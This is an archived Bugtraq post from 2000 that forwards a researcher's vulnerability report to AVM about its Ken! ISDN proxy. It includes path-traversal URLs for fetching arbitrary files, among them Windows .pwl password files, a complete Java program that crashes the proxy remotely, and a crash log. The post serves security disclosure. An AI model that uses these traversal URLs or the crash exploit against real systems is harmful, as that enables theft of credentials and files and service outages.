OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: (no subject)
From: eAX [Teelicht] (eaxMAD.SCIENTIST.COM)
Date: Sat Apr 15 2000 - 08:26:53 CDT


Hi Bugtraq people,

This is a a copy of the mail I send to AVM about the Securtity Bugs in Ken! ISDN Proxy Software.

eAX
---------------------------------------------------------------

Dear AVM Team,

I found two serious (security) bugs in your internet/isdn proxy software AVM Ken!,
and I think I should inform you first about it.
While testing some things on a friends system, which is running Ken! ,I
noticed that I can crash Ken! remotly and force it to cut off all connections,
using a simple Telnet connection. I also found a way to downlaod ANY file from
the Ken! Server. When I say ANY file I mean ANY file!

The Denial of Service attack (crash):

I scanned the system for open ports and noticed that port 3128 was opened by Ken!.
I connected to it via a telnet client and sended some trash (until now just intrested
in the HTTP error message), but then I noticed that Ken! crashs with a pagefault,
closes all connections and restarts.

I retested this with a Windows 98 and a Windows 2000 machine, both Ken!'s crashed.
(Tested with Ken! 1.03.10 (german))

The download everything bug (dangerous!!):

While looking for more bugs, I found out this:

type in your webbrowser:

http://targethost:3128/../../../../../autoexec.bat

or

http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl

If Ken! is located in the C:/Programme/Ken!/ or C:/Program Files/Ken! , this will
cause ken to send you the autoexec.bat, or any file you want (just change the url).

I already cracked a test server to check how dangerous this security hole is, and
I found out that it is extremly dangerous for servers with important files or remote
acess (Windows 2000 telnetd), because the person who set it up for me, installed Ken!
in the default directory. Imagine what would happen if someone would steal a important
database from a server running Ken!
The best thing to prevent misuse is to install Ken! into a diffrent directory until the
bug is fixed (If Ken! isn't located in one of these directorys, you can find the directory
by testing the path until you find autoexec.bat, but this is hard.).

Retested on a LAN and the Internet, with a Windows 98 and a Windows 2000 Server.
(Tested with Ken! 1.03.10 (german))

Your eAX (17 years old)

P.S.Attached to this message is a EXPLOIT CODE written in Java, what can be used
on any OS. I also attached a part of the log file from Ken!.

P.SS. Maybe, I will post this to a security mailing list and rootshell in a few days.
I say a few days, cause I think you should have time to fix the bugs, if you haven't
done this already.

P.SSS. Better luck next time :)

P.SSSS. Fritz Card is really cool!

----Exploit Code------

import java.net.Socket;
import java.io.*;

/*
BARBIE - The AVM KEN! exploit

This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again,
a few seconds later.

Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

String adress;

public void killken() {
PrintWriter out = null;
try{
    Socket connection = new Socket( adress, 3128);
    System.out.println("");
    System.out.println("killing...");
    out = new PrintWriter(connection.getOutputStream(), true);
    out.println("Whooopppss_Ken_died");
    connection.close();
   }
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}
}

public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}

}

----------------------

------Log file--------

2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
2000-04-12 20:40:14 kenserv: TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK

----------------------
______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup